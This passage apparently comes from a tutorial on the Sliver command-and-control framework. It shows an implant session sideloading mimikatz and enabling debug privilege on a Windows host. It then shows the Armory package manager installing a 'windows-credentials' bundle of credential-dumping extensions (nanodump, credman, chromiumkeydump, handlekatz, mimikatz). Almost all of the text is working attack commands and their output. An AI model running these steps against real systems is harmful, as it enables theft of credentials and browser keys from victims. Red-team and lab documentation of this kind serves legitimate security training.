sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # exit
Bye!

```

## Armory

Armory is Sliver's package manager for aliases and extensions (BOFs, .NET tools and the like); it lets you download additional packages.

```bash
sliver > armory
```

Install a package or bundle (`windows-credentials` is a bundle that pulls in several extensions):

```bash
sliver > armory install windows-credentials

[*] Installing extension 'coff-loader' (v1.0.14) ... done!
[*] Installing extension 'nanodump' (v0.0.5) ... done!
[*] Installing extension 'credman' (v1.0.7) ... done!
[*] Installing extension 'chromiumkeydump' (v0.0.2) ... done!
[*] Installing extension 'handlekatz' (v0.0.1) ... done!
[*] Installing extension 'mimikatz' (v0.0.1) ... done!

```

